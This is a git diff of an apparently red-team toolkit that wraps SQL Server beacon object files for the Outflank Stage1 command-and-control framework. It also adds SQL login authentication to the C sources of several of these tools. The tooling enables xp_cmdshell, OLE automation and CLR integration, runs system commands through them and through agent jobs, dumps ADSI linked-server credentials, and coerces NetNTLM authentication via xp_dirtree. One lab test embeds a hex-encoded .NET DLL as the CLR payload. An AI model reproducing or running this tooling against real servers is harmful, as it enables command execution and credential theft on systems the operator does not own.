diff --git a/SQL/SQL_bof.s1.py b/SQL/SQL_bof.s1.py new file mode 100644 index 0000000..bfb56dc --- /dev/null +++ b/SQL/SQL_bof.s1.py @@ -0,0 +1,597 @@ +from hashlib import sha512 +from typing import Dict, List, Optional, Tuple + +from outflank_stage1.task.base_bof_task import BaseBOFTask +from outflank_stage1.task.enums import BOFArgumentEncoding +from outflank_stage1.task.exceptions import TaskInvalidArgumentsException + +class SQLBOFTask(): + + def __init__(self, name: str, base_binary_name: str = None): + super().__init__(name, base_binary_name=base_binary_name) + + self.parser.add_argument( + "server", + ) + + self.add_auth_args() + + def add_auth_args(self): + + self.parser.add_argument( + "-u", "--user", + help="user for SQL authentication; if omitted, Windows authentication is used", + default="", + nargs="?" + ) + + self.parser.add_argument( + "-p", "--password", + help="password for SQL authentication", + default="", + nargs="?" + ) + + def add_common_args(self): + + self.parser.add_argument( + "database", + default="", + nargs="?" + ) + + self.parser.add_argument( + "linkedserver", + default="", + nargs="?" + ) + + self.parser.add_argument( + "impersonate", + default="", + nargs="?" + ) + + def encode_auth_args(self, arguments: List[str]) -> List[Tuple[BOFArgumentEncoding, str]]: + parser_arguments = self.parser.parse_args(arguments) + + return [ + (BOFArgumentEncoding.STR, parser_arguments.server), + (BOFArgumentEncoding.STR, parser_arguments.user), + (BOFArgumentEncoding.STR, parser_arguments.password), + ] + + def encode_common_args(self, arguments: List[str]) -> List[Tuple[BOFArgumentEncoding, str]]: + parser_arguments = self.parser.parse_args(arguments) + + return self.encode_auth_args(arguments) + [ + (BOFArgumentEncoding.STR, parser_arguments.database), + (BOFArgumentEncoding.STR, parser_arguments.linkedserver), + (BOFArgumentEncoding.STR, parser_arguments.impersonate), + ] + + def _encode_arguments_bof(self, arguments: List[str]) -> List[Tuple[BOFArgumentEncoding, str]]: + return self.encode_common_args(arguments) + + def split_arguments(self, arguments: Optional[str], strip_quotes: bool = True) -> List[str]: + # warning: this does only strip double quotes, single quotes are passed on + return super().split_arguments(arguments, strip_quotes) + +class SQL1434udpBOF(SQLBOFTask, BaseBOFTask): + + def __init__(self): + super().__init__("sql-1434udp", "./1434udp/1434udp") + + self.parser.description = "Enumerate SQL Server connection info" + + self.parser.epilog = "Must provide an IP; hostnames are not accepted" + + def _encode_arguments_bof(self, arguments: List[str]) -> List[Tuple[BOFArgumentEncoding, str]]: + parser_arguments = self.parser.parse_args(arguments) + + return [ + (BOFArgumentEncoding.STR, parser_arguments.server), + ] + +class SQLAdsiBOF(SQLBOFTask, BaseBOFTask): + + def __init__(self): + super().__init__("sql-adsi", "./adsi/adsi") + + self.parser.add_argument( + "adsiserver", + ) + + self.parser.add_argument( + "port", + default=4444, + nargs="?" + ) + + self.add_common_args() + + self.parser.description = "Obtain ADSI creds from ADSI linked server" + + self.parser.epilog = "Port defaults to 4444. This gets opened on the SQL Server with the ADSI link, not the beaconing host" + + def _encode_arguments_bof(self, arguments: List[str]) -> List[Tuple[BOFArgumentEncoding, str]]: + parser_arguments = self.parser.parse_args(arguments) + + return self.encode_common_args(arguments) + [ + (BOFArgumentEncoding.STR, parser_arguments.adsiserver), + (BOFArgumentEncoding.STR, parser_arguments.port), + ] + +class SQLAgentCmdBOF(SQLBOFTask, BaseBOFTask): + + def __init__(self): + super().__init__("sql-agentcmd", "./agentcmd/agentcmd") + + self.parser.add_argument( + "command", + ) + + self.add_common_args() + + self.parser.description = "Execute a system command using agent jobs" + + self.parser.epilog = "Output is not returned" + + def _encode_arguments_bof(self, arguments: List[str]) -> List[Tuple[BOFArgumentEncoding, str]]: + parser_arguments = self.parser.parse_args(arguments) + + return self.encode_common_args(arguments) + [ + (BOFArgumentEncoding.STR, parser_arguments.command), + ] + +class SQLAgentStatusBOF(SQLBOFTask, BaseBOFTask): + + def __init__(self): + super().__init__("sql-agentstatus", "./agentstatus/agentstatus") + + self.add_common_args() + + self.parser.description = "Enumerate SQL agent status and jobs" + + def _encode_arguments_bof(self, arguments: List[str]) -> List[Tuple[BOFArgumentEncoding, str]]: + return self.encode_common_args(arguments) + +class SQLCheckRpcBOF(SQLBOFTask, BaseBOFTask): + + def __init__(self): + super().__init__("sql-checkrpc", "./checkrpc/checkrpc") + + self.add_common_args() + + self.parser.description = "Enumerate RPC status of linked servers" + +class SQLClrBOF(SQLBOFTask, BaseBOFTask): + + def __init__(self): + super().__init__("sql-clr", "./clr/clr") + + # not needed, will always be asked to upload assembly through GUI + # + # self.parser.add_argument( + # "dllpath", + # ) + + self.parser.add_argument( + "function", + help="name of the stored procedure to create" + ) + + self.add_common_args() + + self.parser.description = "Load and execute .NET assembly in a stored procedure" + + def validate_files(self, arguments: List[str]): + + assembly = self.get_file_by_name("assembly") + + if assembly is None: + raise TaskInvalidArgumentsException("No .NET assembly uploaded") + + if not assembly.original_name.endswith(".dll"): + raise TaskInvalidArgumentsException("Uploaded file is not a DLL") + + def get_gui_elements(self) -> Optional[Dict]: + return { + "title": "Upload .NET assembly", + "desc": "Load and execute .NET assembly in a stored procedure", + "elements": [ + { + "name": "assembly", + "type": "file", + "description": ".NET assembly", + "placeholder": "Select .NET assembly", + }, + ], + } + + def _encode_arguments_bof(self, arguments: List[str]) -> List[Tuple[BOFArgumentEncoding, str]]: + + assembly = self.get_file_by_name("assembly") + + self.append_response(f'[*] Running sql-clr BOF with .NET assembly: "{assembly.original_name}"\n\n') + + parser_arguments = self.parser.parse_args(arguments) + + return self.encode_common_args(arguments) + [ + (BOFArgumentEncoding.STR, parser_arguments.function), + (BOFArgumentEncoding.STR, sha512(assembly.content).hexdigest()), + (BOFArgumentEncoding.BUFFER, assembly.content), + ] + +class SQLColumnsBOF(SQLBOFTask, BaseBOFTask): + + def __init__(self): + super().__init__("sql-columns", "./columns/columns") + + self.parser.add_argument( + "table", + ) + + self.add_common_args() + + self.parser.description = "Enumerate columns within a table" + + def _encode_arguments_bof(self, arguments: List[str]) -> List[Tuple[BOFArgumentEncoding, str]]: + parser_arguments = self.parser.parse_args(arguments) + + # cannot use encode_common_args helper function, because table is passed in middle of other arguments + return self.encode_auth_args(arguments) + [ + (BOFArgumentEncoding.STR, parser_arguments.database), + (BOFArgumentEncoding.STR, parser_arguments.table), + (BOFArgumentEncoding.STR, parser_arguments.linkedserver), + (BOFArgumentEncoding.STR, parser_arguments.impersonate), + ] + +class SQLDatabasesBOF(SQLBOFTask, BaseBOFTask): + + def __init__(self): + super().__init__("sql-databases", "./databases/databases") + + self.add_common_args() + + self.parser.description = "Enumerate databases on a server" + +class SQLDisableClrBOF(SQLBOFTask, BaseBOFTask): + + def __init__(self): + super().__init__("sql-disableclr", "./togglemodule/togglemodule") + + self.add_common_args() + + self.parser.description = "Disable CLR integration" + + def _encode_arguments_bof(self, arguments: List[str]) -> List[Tuple[BOFArgumentEncoding, str]]: + parser_arguments = self.parser.parse_args(arguments) + + return self.encode_common_args(arguments) + [ + (BOFArgumentEncoding.STR, "clr enabled"), + (BOFArgumentEncoding.STR, "0"), + ] + +class SQLEnableClrBOF(SQLBOFTask, BaseBOFTask): + + def __init__(self): + super().__init__("sql-enableclr", "./togglemodule/togglemodule") + + self.add_common_args() + + self.parser.description = "Enable CLR integration" + + def _encode_arguments_bof(self, arguments: List[str]) -> List[Tuple[BOFArgumentEncoding, str]]: + parser_arguments = self.parser.parse_args(arguments) + + return self.encode_common_args(arguments) + [ + (BOFArgumentEncoding.STR, "clr enabled"), + (BOFArgumentEncoding.STR, "1"), + ] + +class SQLDisableOleBOF(SQLBOFTask, BaseBOFTask): + + def __init__(self): + super().__init__("sql-disableole", "./togglemodule/togglemodule") + + self.add_common_args() + + self.parser.description = "Disable OLE Automation Procedures" + + def _encode_arguments_bof(self, arguments: List[str]) -> List[Tuple[BOFArgumentEncoding, str]]: + parser_arguments = self.parser.parse_args(arguments) + + return self.encode_common_args(arguments) + [ + (BOFArgumentEncoding.STR, "Ole Automation Procedures"), + (BOFArgumentEncoding.STR, "0"), + ] + +class SQLEnableOleBOF(SQLBOFTask, BaseBOFTask): + + def __init__(self): + super().__init__("sql-enableole", "./togglemodule/togglemodule") + + self.add_common_args() + + self.parser.description = "Enable OLE Automation Procedures" + + def _encode_arguments_bof(self, arguments: List[str]) -> List[Tuple[BOFArgumentEncoding, str]]: + parser_arguments = self.parser.parse_args(arguments) + + return self.encode_common_args(arguments) + [ + (BOFArgumentEncoding.STR, "Ole Automation Procedures"), + (BOFArgumentEncoding.STR, "1"), + ] + +class SQLDisableRpcBOF(SQLBOFTask, BaseBOFTask): + + def __init__(self): + super().__init__("sql-disablerpc", "./togglemodule/togglemodule") + + self.add_common_args() + + self.parser.description = "Disable RPC and RPC out on a linked server" + + def _encode_arguments_bof(self, arguments: List[str]) -> List[Tuple[BOFArgumentEncoding, str]]: + parser_arguments = self.parser.parse_args(arguments) + + return self.encode_common_args(arguments) + [ + (BOFArgumentEncoding.STR, "rpc"), + (BOFArgumentEncoding.STR, "FALSE"), + ] + +class SQLEnableRpcBOF(SQLBOFTask, BaseBOFTask): + + def __init__(self): + super().__init__("sql-enablerpc", "./togglemodule/togglemodule") + + self.add_common_args() + + self.parser.description = "Enable RPC and RPC out on a linked server" + + def _encode_arguments_bof(self, arguments: List[str]) -> List[Tuple[BOFArgumentEncoding, str]]: + parser_arguments = self.parser.parse_args(arguments) + + return self.encode_common_args(arguments) + [ + (BOFArgumentEncoding.STR, "rpc"), + (BOFArgumentEncoding.STR, "TRUE"), + ] + +class SQLDisableXpBOF(SQLBOFTask, BaseBOFTask): + + def __init__(self): + super().__init__("sql-disablexp", "./togglemodule/togglemodule") + + self.add_common_args() + + self.parser.description = "Disable xp_cmdshell" + + def _encode_arguments_bof(self, arguments: List[str]) -> List[Tuple[BOFArgumentEncoding, str]]: + parser_arguments = self.parser.parse_args(arguments) + + return self.encode_common_args(arguments) + [ + (BOFArgumentEncoding.STR, "xp_cmdshell"), + (BOFArgumentEncoding.STR, "0"), + ] + +class SQLEnableXpBOF(SQLBOFTask, BaseBOFTask): + + def __init__(self): + super().__init__("sql-enablexp", "./togglemodule/togglemodule") + + self.add_common_args() + + self.parser.description = "Enable xp_cmdshell" + + def _encode_arguments_bof(self, arguments: List[str]) -> List[Tuple[BOFArgumentEncoding, str]]: + parser_arguments = self.parser.parse_args(arguments) + + return self.encode_common_args(arguments) + [ + (BOFArgumentEncoding.STR, "xp_cmdshell"), + (BOFArgumentEncoding.STR, "1"), + ] + +class SQLImperonsate(SQLBOFTask, BaseBOFTask): + + def __init__(self): + super().__init__("sql-impersonate", "./impersonate/impersonate") + + self.parser.add_argument( + "database", + default="", + nargs="?" + ) + + self.parser.description = "Enumerate users that can be impersonated" + + def _encode_arguments_bof(self, arguments: List[str]) -> List[Tuple[BOFArgumentEncoding, str]]: + parser_arguments = self.parser.parse_args(arguments) + + return self.encode_auth_args(arguments) + [ + (BOFArgumentEncoding.STR, parser_arguments.database), + ] + +class SQLInfoBOF(SQLBOFTask, BaseBOFTask): + + def __init__(self): + super().__init__("sql-info", "./info/info") + + self.parser.add_argument( + "database", + default="", + nargs="?" + ) + + self.parser.description = "Gather information about the SQL server" + + def _encode_arguments_bof(self, arguments: List[str]) -> List[Tuple[BOFArgumentEncoding, str]]: + parser_arguments = self.parser.parse_args(arguments) + + return self.encode_auth_args(arguments) + [ + (BOFArgumentEncoding.STR, parser_arguments.database), + ] + +class SQLLinksBOF(SQLBOFTask, BaseBOFTask): + + def __init__(self): + super().__init__("sql-links", "./links/links") + + self.add_common_args() + + self.parser.description = "Enumerate linked servers" + +class SQLOleCmdBOF(SQLBOFTask, BaseBOFTask): + + def __init__(self): + super().__init__("sql-olecmd", "./olecmd/olecmd") + + self.parser.add_argument( + "command", + ) + + self.add_common_args() + + self.parser.description = "Execute a system command using OLE automation procedures" + + self.parser.epilog = "Output is not returned" + + def _encode_arguments_bof(self, arguments: List[str]) -> List[Tuple[BOFArgumentEncoding, str]]: + parser_arguments = self.parser.parse_args(arguments) + + return self.encode_common_args(arguments) + [ + (BOFArgumentEncoding.STR, parser_arguments.command), + ] + +class SQLQueryBOF(SQLBOFTask, BaseBOFTask): + + def __init__(self): + super().__init__("sql-query", "./query/query") + + self.parser.add_argument( + "query", + ) + + self.add_common_args() + + self.parser.description = "Execute a custom SQL query" + + def _encode_arguments_bof(self, arguments: List[str]) -> List[Tuple[BOFArgumentEncoding, str]]: + parser_arguments = self.parser.parse_args(arguments) + + return self.encode_common_args(arguments) + [ + (BOFArgumentEncoding.STR, parser_arguments.query), + ] + +class SQLRowsBOF(SQLBOFTask, BaseBOFTask): + + def __init__(self): + super().__init__("sql-rows", "./rows/rows") + + self.parser.add_argument( + "table", + ) + + self.add_common_args() + + self.parser.description = "Get the count of rows in a table" + + def _encode_arguments_bof(self, arguments: List[str]) -> List[Tuple[BOFArgumentEncoding, str]]: + parser_arguments = self.parser.parse_args(arguments) + + # cannot use encode_common_args helper function, because table is passed in middle of other arguments + return self.encode_auth_args(arguments) + [ + (BOFArgumentEncoding.STR, parser_arguments.database), + (BOFArgumentEncoding.STR, parser_arguments.table), + (BOFArgumentEncoding.STR, parser_arguments.linkedserver), + (BOFArgumentEncoding.STR, parser_arguments.impersonate), + ] + +class SQLSearchBOF(SQLBOFTask, BaseBOFTask): + + def __init__(self): + super().__init__("sql-search", "./search/search") + + self.parser.add_argument( + "keyword", + ) + + self.add_common_args() + + self.parser.description = "Search a table for a column name" + + def _encode_arguments_bof(self, arguments: List[str]) -> List[Tuple[BOFArgumentEncoding, str]]: + parser_arguments = self.parser.parse_args(arguments) + + return self.encode_common_args(arguments) + [ + (BOFArgumentEncoding.STR, parser_arguments.keyword), + ] + +class SQLSmbBOF(SQLBOFTask, BaseBOFTask): + + def __init__(self): + super().__init__("sql-smb", "./smb/smb") + + self.parser.add_argument( + "listener", + ) + + self.add_common_args() + + self.parser.description = "Coerce NetNTLM auth via xp_dirtree" + + def _encode_arguments_bof(self, arguments: List[str]) -> List[Tuple[BOFArgumentEncoding, str]]: + parser_arguments = self.parser.parse_args(arguments) + + return self.encode_common_args(arguments) + [ + (BOFArgumentEncoding.STR, parser_arguments.listener), + ] + +class SQLTablesBOF(SQLBOFTask, BaseBOFTask): + + def __init__(self): + super().__init__("sql-tables", "./tables/tables") + + self.add_common_args() + + self.parser.description = "Enumerate tables within a database" + +class SQLUsersBOF(SQLBOFTask, BaseBOFTask): + + def __init__(self): + super().__init__("sql-users", "./users/users") + + self.add_common_args() + + self.parser.description = "Enumerate users with database access" + +class SQLWhoamiBOF(SQLBOFTask, BaseBOFTask): + + def __init__(self): + super().__init__("sql-whoami", "./whoami/whoami") + + self.add_common_args() + + self.parser.description = "Gather information about the SQL server" + +class SQLXpCmdBOF(SQLBOFTask, BaseBOFTask): + + def __init__(self): + super().__init__("sql-xpcmd", "./xpcmd/xpcmd") + + self.parser.add_argument( + "command", + ) + + self.add_common_args() + + self.parser.description = "Execute a system command using xp_cmdshell" + + self.parser.epilog = "Output returned unless using a linked server. WARNING: running a persistent command will cause the beacon to hang" + + def _encode_arguments_bof(self, arguments: List[str]) -> List[Tuple[BOFArgumentEncoding, str]]: + parser_arguments = self.parser.parse_args(arguments) + + return self.encode_common_args(arguments) + [ + (BOFArgumentEncoding.STR, parser_arguments.command), + ] diff --git a/src/SQL/adsi/entry.c b/src/SQL/adsi/entry.c index 7cb9fe2..f0262f1 100644 --- a/src/SQL/adsi/entry.c +++ b/src/SQL/adsi/entry.c @@ -36,7 +36,7 @@ void* RunThreadedQuery(LPVOID threadData) { intFree(query); } -void DumpAdsiCreds(char* server, char* database, char* link, char* impersonate, char* adsiServer, char* port) +void DumpAdsiCreds(char* server, char* user, char* password, char* database, char* link, char* impersonate, char* adsiServer, char* port) { SQLHENV env = NULL; SQLHSTMT stmt = NULL; @@ -58,11 +58,11 @@ void DumpAdsiCreds(char* server, char* database, char* link, char* impersonate, if (link == NULL) { - dbc = ConnectToSqlServer(&env, server, database); + dbc = ConnectToSqlServer(&env, server, user, password, database); } else { - dbc = ConnectToSqlServer(&env, server, NULL); + dbc = ConnectToSqlServer(&env, server, user, password, NULL); } if (dbc == NULL) { @@ -245,11 +245,11 @@ void DumpAdsiCreds(char* server, char* database, char* link, char* impersonate, internal_printf("[*] Creating a second connection to the SQL server for threaded query\n"); if (link == NULL) { - dbc2 = ConnectToSqlServer(&env2, server, database); + dbc2 = ConnectToSqlServer(&env2, server, user, password, database); } else { - dbc2 = ConnectToSqlServer(&env2, server, NULL); + dbc2 = ConnectToSqlServer(&env2, server, user, password, NULL); } if (dbc2 == NULL) { @@ -371,6 +371,8 @@ VOID go( ) { char* server; + char* user; + char* password; char* database; char* link; char* impersonate; @@ -383,6 +385,8 @@ VOID go( datap parser; BeaconDataParse(&parser, Buffer, Length); server = BeaconDataExtract(&parser, NULL); + user = BeaconDataExtract(&parser, NULL); + password = BeaconDataExtract(&parser, NULL); database = BeaconDataExtract(&parser, NULL); link = BeaconDataExtract(&parser, NULL); impersonate = BeaconDataExtract(&parser, NULL); @@ -390,6 +394,8 @@ VOID go( port = BeaconDataExtract(&parser, NULL); server = *server == 0 ? "localhost" : server; + user = *user == 0 ? NULL : user; + password = *password == 0 ? NULL : password; database = *database == 0 ? "master" : database; link = *link == 0 ? NULL : link; impersonate = *impersonate == 0 ? NULL : impersonate; @@ -404,7 +410,7 @@ VOID go( return; } - DumpAdsiCreds(server, database, link, impersonate, adsiServer, port); + DumpAdsiCreds(server, user, password, database, link, impersonate, adsiServer, port); printoutput(TRUE); }; @@ -413,13 +419,13 @@ VOID go( int main() { internal_printf("============ BASE TEST ============\n\n"); - DumpAdsiCreds("castelblack.north.sevenkingdoms.local", "master", NULL, NULL, "ADSIr", "4444"); + DumpAdsiCreds("castelblack.north.sevenkingdoms.local", NULL, NULL, "master", NULL, NULL, "ADSIr", "4444"); internal_printf("\n\n============ IMPERSONATE TEST ============\n\n"); - DumpAdsiCreds("castelblack.north.sevenkingdoms.local", "master", NULL, "sa", "ADSIr", "4444"); + DumpAdsiCreds("castelblack.north.sevenkingdoms.local", NULL, NULL, "master", NULL, "sa", "ADSIr", "4444"); internal_printf("\n\n============ LINK TEST ============\n\n"); - DumpAdsiCreds("castelblack.north.sevenkingdoms.local", "master", "BRAAVOS", NULL, "ADSIEssos", "4444"); + DumpAdsiCreds("castelblack.north.sevenkingdoms.local", NULL, NULL, "master", "BRAAVOS", NULL, "ADSIEssos", "4444"); } #endif diff --git a/src/SQL/agentcmd/entry.c b/src/SQL/agentcmd/entry.c index 3f5c4b6..af92030 100644 --- a/src/SQL/agentcmd/entry.c +++ b/src/SQL/agentcmd/entry.c @@ -5,7 +5,7 @@ #include "sql_agent.c" -void ExecuteAgentCommand(char* server, char* database, char* link, char* impersonate, char* command) +void ExecuteAgentCommand(char* server, char* user, char* password, char* database, char* link, char* impersonate, char* command) { SQLHENV env = NULL; SQLHSTMT stmt = NULL; @@ -17,11 +17,11 @@ void ExecuteAgentCommand(char* server, char* database, char* link, char* imperso if (link == NULL) { - dbc = ConnectToSqlServer(&env, server, database); + dbc = ConnectToSqlServer(&env, server, user, password, database); } else { - dbc = ConnectToSqlServer(&env, server, NULL); + dbc = ConnectToSqlServer(&env, server, user, password, NULL); } if (dbc == NULL) { @@ -168,6 +168,8 @@ VOID go( ) { char* server; + char* user; + char* password; char* database; char* link; char* impersonate; @@ -180,12 +182,16 @@ VOID go( BeaconDataParse(&parser, Buffer, Length); server = BeaconDataExtract(&parser, NULL); + user = BeaconDataExtract(&parser, NULL); + password = BeaconDataExtract(&parser, NULL); database = BeaconDataExtract(&parser, NULL); link = BeaconDataExtract(&parser, NULL); impersonate = BeaconDataExtract(&parser, NULL); command = BeaconDataExtract(&parser, NULL); server = *server == 0 ? "localhost" : server; + user = *user == 0 ? NULL : user; + password = *password == 0 ? NULL : password; database = *database == 0 ? "master" : database; link = *link == 0 ? NULL : link; impersonate = *impersonate == 0 ? NULL : impersonate; @@ -200,7 +206,7 @@ VOID go( return; } - ExecuteAgentCommand(server, database, link, impersonate, command); + ExecuteAgentCommand(server, user, password, database, link, impersonate, command); printoutput(TRUE); }; @@ -213,13 +219,13 @@ int main() // GOAD uses SQLExpress so turning to makeshift lab here // internal_printf("============ BASE TEST ============\n\n"); - ExecuteAgentCommand("192.168.0.215", "master", NULL, NULL, "notepad.exe"); + ExecuteAgentCommand("192.168.0.215", NULL, NULL, "master", NULL, NULL, "notepad.exe"); internal_printf("\n\n============ IMPERSONATE TEST ============\n\n"); - ExecuteAgentCommand("192.168.0.215", "master", NULL, "sa", "notepad.exe"); + ExecuteAgentCommand("192.168.0.215", NULL, NULL, "master", NULL, "sa", "notepad.exe"); internal_printf("\n\n============ LINK TEST ============\n\n"); - ExecuteAgentCommand("192.168.0.215", "master", "TRETOGOR", NULL, "notepad.exe"); + ExecuteAgentCommand("192.168.0.215", NULL, NULL, "master", "TRETOGOR", NULL, "notepad.exe"); } #endif diff --git a/src/SQL/agentstatus/entry.c b/src/SQL/agentstatus/entry.c index bf54b5d..720a563 100644 --- a/src/SQL/agentstatus/entry.c +++ b/src/SQL/agentstatus/entry.c @@ -5,7 +5,7 @@ #include "sql_agent.c" -void CheckAgentStatus(char* server, char* database, char* link, char* impersonate) +void CheckAgentStatus(char* server, char* user, char* password, char* database, char* link, char* impersonate) { SQLHENV env = NULL; SQLHSTMT stmt = NULL; @@ -15,11 +15,11 @@ void CheckAgentStatus(char* server, char* database, char* link, char* impersonat if (link == NULL) { - dbc = ConnectToSqlServer(&env, server, database); + dbc = ConnectToSqlServer(&env, server, user, password, database); } else { - dbc = ConnectToSqlServer(&env, server, NULL); + dbc = ConnectToSqlServer(&env, server, user, password, NULL); } if (dbc == NULL) { @@ -82,6 +82,8 @@ VOID go( ) { char* server; + char* user; + char* password; char* database; char* link; char* impersonate; @@ -93,11 +95,15 @@ VOID go( BeaconDataParse(&parser, Buffer, Length); server = BeaconDataExtract(&parser, NULL); + user = BeaconDataExtract(&parser, NULL); + password = BeaconDataExtract(&parser, NULL); database = BeaconDataExtract(&parser, NULL); link = BeaconDataExtract(&parser, NULL); impersonate = BeaconDataExtract(&parser, NULL); server = *server == 0 ? "localhost" : server; + user = *user == 0 ? NULL : user; + password = *password == 0 ? NULL : password; database = *database == 0 ? "master" : database; link = *link == 0 ? NULL : link; impersonate = *impersonate == 0 ? NULL : impersonate; @@ -112,7 +118,7 @@ VOID go( return; } - CheckAgentStatus(server, database, link, impersonate); + CheckAgentStatus(server, user, password, database, link, impersonate); printoutput(TRUE); }; @@ -125,13 +131,13 @@ int main() // GOAD uses SQLExpress so turning to makeshift lab here // internal_printf("============ BASE TEST ============\n\n"); - CheckAgentStatus("192.168.0.215", "master", NULL, NULL); + CheckAgentStatus("192.168.0.215", NULL, NULL, "master", NULL, NULL); internal_printf("\n\n============ IMPERSONATE TEST ============\n\n"); - CheckAgentStatus("192.168.0.215", "master", NULL, "sa"); + CheckAgentStatus("192.168.0.215", NULL, NULL, "master", NULL, "sa"); internal_printf("\n\n============ LINK TEST ============\n\n"); - CheckAgentStatus("192.168.0.215", "master", "TRETOGOR", NULL); + CheckAgentStatus("192.168.0.215", NULL, NULL, "master", "TRETOGOR", NULL); } #endif diff --git a/src/SQL/checkrpc/entry.c b/src/SQL/checkrpc/entry.c index f62bccc..c858ea8 100644 --- a/src/SQL/checkrpc/entry.c +++ b/src/SQL/checkrpc/entry.c @@ -3,7 +3,7 @@ #include "sql.c" -void CheckRpc(char* server, char* database, char* link, char* impersonate) +void CheckRpc(char* server, char* user, char* password, char* database, char* link, char* impersonate) { SQLHENV env = NULL; SQLHSTMT stmt = NULL; @@ -13,11 +13,11 @@ void CheckRpc(char* server, char* database, char* link, char* impersonate) if (link == NULL) { - dbc = ConnectToSqlServer(&env, server, database); + dbc = ConnectToSqlServer(&env, server, user, password, database); } else { - dbc = ConnectToSqlServer(&env, server, NULL); + dbc = ConnectToSqlServer(&env, server, user, password, NULL); } if (dbc == NULL) { @@ -65,6 +65,8 @@ VOID go( ) { char* server; + char* user; + char* password; char* database; char* link; char* impersonate; @@ -76,12 +78,16 @@ VOID go( BeaconDataParse(&parser, Buffer, Length); server = BeaconDataExtract(&parser, NULL); + user = BeaconDataExtract(&parser, NULL); + password = BeaconDataExtract(&parser, NULL); database = BeaconDataExtract(&parser, NULL); link = BeaconDataExtract(&parser, NULL); impersonate = BeaconDataExtract(&parser, NULL); server = *server == 0 ? "localhost" : server; database = *database == 0 ? "master" : database; + user = *user == 0 ? NULL : user; + password = *password == 0 ? NULL : password; link = *link == 0 ? NULL : link; impersonate = *impersonate == 0 ? NULL : impersonate; @@ -95,7 +101,7 @@ VOID go( return; } - CheckRpc(server, database, link, impersonate); + CheckRpc(server, user, password, database, link, impersonate); printoutput(TRUE); }; @@ -105,13 +111,13 @@ VOID go( int main() { internal_printf("============ BASE TEST ============\n\n"); - CheckRpc("castelblack.north.sevenkingdoms.local", "master", NULL, NULL); + CheckRpc("castelblack.north.sevenkingdoms.local", NULL, NULL, "master", NULL, NULL); internal_printf("\n\n============ IMPERSONATE TEST ============\n\n"); - CheckRpc("castelblack.north.sevenkingdoms.local", "master", NULL, "sa"); + CheckRpc("castelblack.north.sevenkingdoms.local", NULL, NULL, "master", NULL, "sa"); internal_printf("\n\n============ LINK TEST ============\n\n"); - CheckRpc("castelblack.north.sevenkingdoms.local", "master", "BRAAVOS", NULL); + CheckRpc("castelblack.north.sevenkingdoms.local", NULL, NULL, "master", "BRAAVOS", NULL); } #endif diff --git a/src/SQL/clr/entry.c b/src/SQL/clr/entry.c index bb2b5c6..88ef7b2 100644 --- a/src/SQL/clr/entry.c +++ b/src/SQL/clr/entry.c @@ -5,7 +5,7 @@ #include "sql_clr.c" -void ExecuteClrAssembly(char* server, char* database, char* link, char* impersonate, char* function, char* hash, char* hexBytes) +void ExecuteClrAssembly(char* server, char* user, char* password, char* database, char* link, char* impersonate, char* function, char* hash, char* hexBytes) { SQLHENV env = NULL; SQLHSTMT stmt = NULL; @@ -18,11 +18,11 @@ void ExecuteClrAssembly(char* server, char* database, char* link, char* imperson if (link == NULL) { - dbc = ConnectToSqlServer(&env, server, database); + dbc = ConnectToSqlServer(&env, server, user, password, database); } else { - dbc = ConnectToSqlServer(&env, server, NULL); + dbc = ConnectToSqlServer(&env, server, user, password, NULL); } if (dbc == NULL) { @@ -219,6 +219,8 @@ VOID go( ) { char* server; + char* user; + char* password; char* database; char* link; char* impersonate; @@ -234,6 +236,8 @@ VOID go( datap parser; BeaconDataParse(&parser, Buffer, Length); server = BeaconDataExtract(&parser, NULL); + user = BeaconDataExtract(&parser, NULL); + password = BeaconDataExtract(&parser, NULL); database = BeaconDataExtract(&parser, NULL); link = BeaconDataExtract(&parser, NULL); impersonate = BeaconDataExtract(&parser, NULL); @@ -243,6 +247,8 @@ VOID go( server = *server == 0 ? "localhost" : server; database = *database == 0 ? "master" : database; + user = *user == 0 ? NULL : user; + password = *password == 0 ? NULL : password; link = *link == 0 ? NULL : link; impersonate = *impersonate == 0 ? NULL : impersonate; @@ -273,7 +279,7 @@ VOID go( } hexBytes[dwDllBufferSize * 2] = '\0'; - ExecuteClrAssembly(server, database, link, impersonate, function, hash, hexBytes); + ExecuteClrAssembly(server, user, password, database, link, impersonate, function, hash, hexBytes); intFree(hexBytes); printoutput(TRUE); }; @@ -289,13 +295,13 @@ int main() char* bytes = "4d5a90000300000004000000ffff0000b800000000000000400000000000000000000000000000000000000000000000000000000000000000000000800000000e1fba0e00b409cd21b8014ccd21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000504500004c010300607eef640000000000000000e00002210b010b00000400000006000000000000ce2300000020000000400000000000100020000000020000040000000000000004000000000000000080000000020000000000000300408500001000001000000000100000100000000000001000000000000000000000007c2300004f00000000400000b802000000000000000000000000000000000000006000000c00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000200000080000000000000000000000082000004800000000000000000000002e74657874000000d4030000002000000004000000020000000000000000000000000000200000602e72737263000000b8020000004000000004000000060000000000000000000000000000400000402e72656c6f6300000c0000000060000000020000000a00000000000000000000000000004000004200000000000000000000000000000000b02300000000000048000000020005006820000014030000010000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000036007201000070280400000a262a1e02280500000a2a000042534a4201000100000000000c00000076342e302e33303331390000000005006c0000001c010000237e0000880100001401000023537472696e6773000000009c0200001c00000023555300b8020000100000002347554944000000c80200004c00000023426c6f620000000000000002000001471400000900000000fa253300160000010000000500000002000000020000000500000003000000010000000300000000000a0001000000000006003d0036000600780058000600980058000a00dd00c2000e000601f3000000000001000000000001000100010010001c000000050001000100502000000000960044000a0001005e2000000000861852000e000100110052001200190052000e00210052000e0029000e011c00090052000e0020001b0017002e000b0022002e0013002b000480000000000000000000000000000000004400000004000000000000000000000001002d00000000000400000000000000000000000100b6000000000004000000000000000000000001003600000000000000003c4d6f64756c653e0043726561746550726f636573732e646c6c0053746f72656450726f63656475726573006d73636f726c69620053797374656d004f626a6563740043726561746550726f63657373002e63746f720053797374656d2e52756e74696d652e436f6d70696c6572536572766963657300436f6d70696c6174696f6e52656c61786174696f6e734174747269627574650052756e74696d65436f6d7061746962696c6974794174747269627574650053797374656d2e44617461004d6963726f736f66742e53716c5365727665722e5365727665720053716c50726f6365647572654174747269627574650053797374656d2e446961676e6f73746963730050726f636573730053746172740000176e006f00740065007000610064002e0065007800650000000000e9bbd494c7999b429267cfb509264f810008b77a5c561934e08903000001032000010420010108040100000005000112150e0801000800000000001e01000100540216577261704e6f6e457863657074696f6e5468726f7773010000a42300000000000000000000be230000002000000000000000000000000000000000000000000000b0230000000000000000000000005f436f72446c6c4d61696e006d73636f7265652e646c6c0000000000ff25002000100000000000000